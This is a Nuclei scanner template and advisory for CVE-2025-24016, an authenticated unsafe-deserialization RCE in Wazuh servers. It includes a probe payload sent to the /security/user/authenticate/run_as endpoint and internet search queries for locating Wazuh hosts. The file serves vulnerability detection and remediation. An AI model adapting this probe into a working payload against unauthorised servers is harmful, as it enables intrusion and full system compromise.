A critical Remote Code Execution (RCE) vulnerability exists in Wazuh server versions >= 4.4.0 and < 4.9.1. The vulnerability occurs due to unsafe deserialization in the wazuh-manager package, specifically in the DistributedAPI where parameters are serialized as JSON and deserialized using as_wazuh_object in the framework/wazuh/core/cluster/common.py file. An attacker with API access can exploit this vulnerability by injecting an unsanitized dictionary into DAPI requests, leading to arbitrary Python code execution.
PoC代码[已公开]
id: CVE-2025-24016
info:
name: Wazuh - Unsafe Deserialization Remote Code Execution
author: Hüseyin TINTAŞ,ritikchaddha
severity: critical
description: |
A critical Remote Code Execution (RCE) vulnerability exists in Wazuh server versions >= 4.4.0 and < 4.9.1. The vulnerability occurs due to unsafe deserialization in the wazuh-manager package, specifically in the DistributedAPI where parameters are serialized as JSON and deserialized using as_wazuh_object in the framework/wazuh/core/cluster/common.py file. An attacker with API access can exploit this vulnerability by injecting an unsanitized dictionary into DAPI requests, leading to arbitrary Python code execution.
impact: |
Successful exploitation allows attackers to execute arbitrary code on the Wazuh server with the privileges of the wazuh-manager process. This can lead to complete system compromise, data exfiltration, lateral movement within the network, and potential denial of service conditions.
remediation: |
Upgrade to Wazuh version >= 4.9.1 where this vulnerability has been patched. If immediate upgrade is not possible: Restrict API access to trusted IP addresses only, implement network segmentation to isolate Wazuh servers, monitor for suspicious API requests to the /security/user/authenticate/run_as endpoint, and consider implementing a Web Application Firewall (WAF) to filter malicious requests.
reference:
- https://github.com/MuhammadWaseem29/CVE-2025-24016
- https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh
- https://nvd.nist.gov/vuln/detail/CVE-2025-24016
classification:
epss-score: 0.93801
epss-percentile: 0.99858
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.9
cve-id: CVE-2025-24016
cwe-id: CWE-502
cpe: cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: wazuh
product: wazuh
shodan-query: title:"Wazuh"
fofa-query: app="Wazuh"
tags: cve,cve2025,wazuh,deserialization,rce,authenticated,kev,vkev
flow: http(1) && http(2)
variables:
payload: '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "NameError"
negative: true
internal: true
- raw:
- |
POST /security/user/authenticate/run_as HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Authorization: Basic {{base64(username + ':' + password)}}
{{payload}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "NameError"
- type: status
status:
- 500
# digest: 4a0a004730450221009f235cb71187bed743e69f64f2017b4e73896a4c1ef091232859caaa9575c84c022025de99cbc501e2f7085919a6471b2e228bb08e4efbc3ee5b84db427874c6791f:922c64590222798bb761d5b6d8e72950